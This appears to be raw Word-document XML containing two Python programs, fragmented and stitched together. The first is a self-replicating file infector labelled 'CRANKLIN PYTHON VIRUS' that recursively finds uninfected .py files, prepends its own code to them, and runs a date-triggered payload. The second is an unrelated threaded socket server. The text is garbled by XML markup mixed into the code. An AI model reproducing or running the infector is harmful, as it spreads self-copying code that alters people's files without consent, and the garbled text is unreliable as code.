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8C" w:rsidRPr="00A60D8C" w:rsidRDefault="00A60D8C" w:rsidP="00A60D8C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os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datetime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SIGNATURE = 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"CRANKLIN PYTHON VIRUS"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search(path):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filestoinfect = []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filelist = os.listdir(path)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fname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filelist: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os.path.isdir(path+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"/"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+fname):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filestoinfect.extend(search(path+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"/"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+fname))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elif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fname[-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:] == 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".py"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infected =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for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line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open(path+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"/"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+fname):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SIGNATURE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line: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    infected =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True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        break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        if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infected ==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filestoinfect.append(path+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"/"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+fname)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return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filestoinfect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infect(filestoinfect):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virus = open(os.path.abspath(__file__))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virusstring = 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  <w:t xml:space="preserve">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line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enumerate(virus):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i&gt;=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0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and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i &lt;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39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virusstring += line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virus.close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for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fname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in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filestoinfect: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 = open(fname)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temp = f.read()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f.close()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 = open(fname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,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"w"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f.write(virusstring + temp)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f.close()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bomb():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datetime.datetime.now().month == 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1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and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datetime.datetime.now().day == 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25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print(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"Happy birthday"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filestoinfect = search(os.path.abspath(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infect(filestoinfect)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bomb()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socket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threading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HEADER=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64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FORMAT=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'utf-8'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PORT=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5050 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SERVER=socket.gethostbyname(socket.gethostname())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ADDR=(SERVER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PORT)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DISCONNECT_MESSAGE=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"!DISCONNECT"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server=socket.socket(socket.AF_INET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socket.SOCK_STREAM)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server.bind(ADDR)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handle_client(conn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addr):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print(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f"[NEW CONNECTION]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{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addr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}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 connected"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connected=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True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  <w:t xml:space="preserve">    while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connected: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msg_length=conn.recv(HEADER).decode(FORMAT)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msg_length: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msg_length=int(msg_length)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msg=conn.recv(msg_length).decode(FORMAT)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msg==DISCONNECT_MESSAGE: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        connected=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False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lastRenderedPageBreak/>
        <w:t xml:space="preserve">           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print(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f"[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{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addr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}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]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{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msg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}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conn.close()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def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start():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server.listen()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print(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 xml:space="preserve">f"[LISTENINFG] Server is starting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{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SERVER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}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>while True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conn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addr=server.accept()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thread=threading.Thread(target=handle_client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args=(conn</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D8C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addr))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thread.start()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    active=threading.activeCount()-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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D8C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  <w:t xml:space="preserve">        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print(active)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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D8C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"[STARTING] Server is starting..........."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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A60D8C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start()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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60D8C"/>
    <w:rsid w:val="00470742"/>
    <w:rsid w:val="00A6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0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0D8C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2020-06-30T08:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-30T08:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>